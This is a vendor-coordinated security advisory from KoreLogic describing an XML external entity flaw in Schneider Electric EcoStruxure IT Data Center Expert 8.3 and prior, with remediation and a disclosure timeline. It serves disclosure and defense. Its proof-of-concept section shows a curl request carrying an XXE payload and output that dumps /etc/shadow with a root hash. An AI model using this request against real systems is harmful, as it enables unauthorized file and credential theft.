-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2025-006: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection Title: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection Advisory ID: KL-001-2025-006 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-006.txt 1. Vulnerability Details Affected Vendor: Schneider Electric Affected Product: EcoStruxure IT Data Center Expert Affected Version: 8.3 and prior Platform: CentOS CWE Classification: CWE-611: Improper Restriction of XML External Entity Reference CVE ID: CVE-2025-6438 2. Vulnerability Description The "DataExchange" route allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources. 3. Technical Description From an authenticated perspective a user can send SOAP requests to the "/DataExchange/DataExchangeService" web route, providing an XML document in the POST body. When the web application processes the XML it will insecurely resolve entities that reference external resources, such as local files. The "GetHistoryRequest" SOAP action can be utilized to exfiltrate the resolved value by placing the entity reference within the XML document's "Id" parameter. The resulting error message reflects the value of the resolved entity, such as contents of a local file. 4. Mitigation and Remediation Recommendation Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric's Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf. 5. Credit This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2024-11-21 : KoreLogic reports vulnerability details to Schneider Electric CPCERT. 2024-11-22 : Vendor acknowledges receipt of KoreLogic's submission. 2024-12-06 : Vendor confirms the reported vulnerability. 2024-12-12 : Vendor requests a meeting with KoreLogic to discuss the timeline of remediation efforts for this vulnerability, as well as for associated submissions from KoreLogic. 2024-12-18 : KoreLogic and Schneider Electric agree to embargo vulnerability details until product update 9.0, circa July, 2025. 2025-01-29 : Vendor provides status update. 2025-03-17 : Vendor provides beta release containing remediation for this and other associated vulnerabilities reported by KoreLogic. 2025-06-20 : Vendor notifies KoreLogic that the publication date for this vulnerability will be 2025-07-08. 2025-07-08 : Vendor public disclosure. 2025-07-09 : KoreLogic public disclosure. 7. Proof of Concept [attacker@box]$ cat payload ]> &test; [attacker@box]$ curl --digest --user kore:logic \ -k https://dce.example.com/DataExchange/DataExchangeService \ -H 'Content-Type: text/xml' --data @payload soap:ClientInvalid Idroot:$6$nAQ9/nHfzNJH2Q28$t0.KyJ810alBDwz3NGyEWNGWzQgXdrsUooT1UbXKz9SfpkHLaZngVY6oA8TVCYnCqP2boorvDsmufXawpy1T41:20021:0:99999:7::: bin:*:19767:0:99999:7::: daemon:*:19767:0:99999:7::: adm:*:19767:0:99999:7::: lp:*:19767:0:99999:7::: mail:*:19767:0:99999:7::: ... The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmhurSAaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkelvSQ//U+2sYjMmDGvKhGC1Xp8q L4sKuY66gudn3KGp86cHmvSOi9O0MRHeNnRF8kAZT2avx4Q3sR89h8OXz5NmegRW crHMq+uXs2BltJih5HJoF0jsmhGTFH5h2nmn/xbXwYk0oUY+6Ip8CfFc39C5pkzH P9pd5I3TJvi71sLegz1KgUdsaIw3uYWePUSH6lvEl6KbG7bRvTJAyysa9tFcYx85 pMF1Ae7LS1ySJid3RwI4/iwBMnHb5uhXr8rRuKAnUbBn0GzeinzuiRCxew7AjqFs uuXUA9hf9nUoPfI5QI6Q3cjBbm040PvH8uW76QyNnumOXpaUl+8cZMGOcW6tijpk 0btfYpuSLM5qNLfEnxte1gZqV7bOHDgj+h3o1BKNhQVghxGvs3ae7X1avMtN/fUG b70fg95z3P633HeHAt0RrsCSpW3Y6u2zEkQqVZ/mkyfprWwngTL/P+Gk/KmCGZ9o gC4Q5HnxZS4aGNUEzXeK8znxb+WschtYm3H214fKaNbN+k3luUighIpPzxrsPAdZ w5qir5lRmmCi2rV/3sOkd+yx65ZnbxgKjlKk8x9+ue/d3E6SqiDOF+Tz4hv+typs du3GSPYwNBZuriYNJNrmhj05QQxFJA6TBDPnrlyjm9kl/HtqWlTv7jv16RZYKOV/ QoisPz/GyEo9oyp0zfjnko8= =xL0O -----END PGP SIGNATURE-----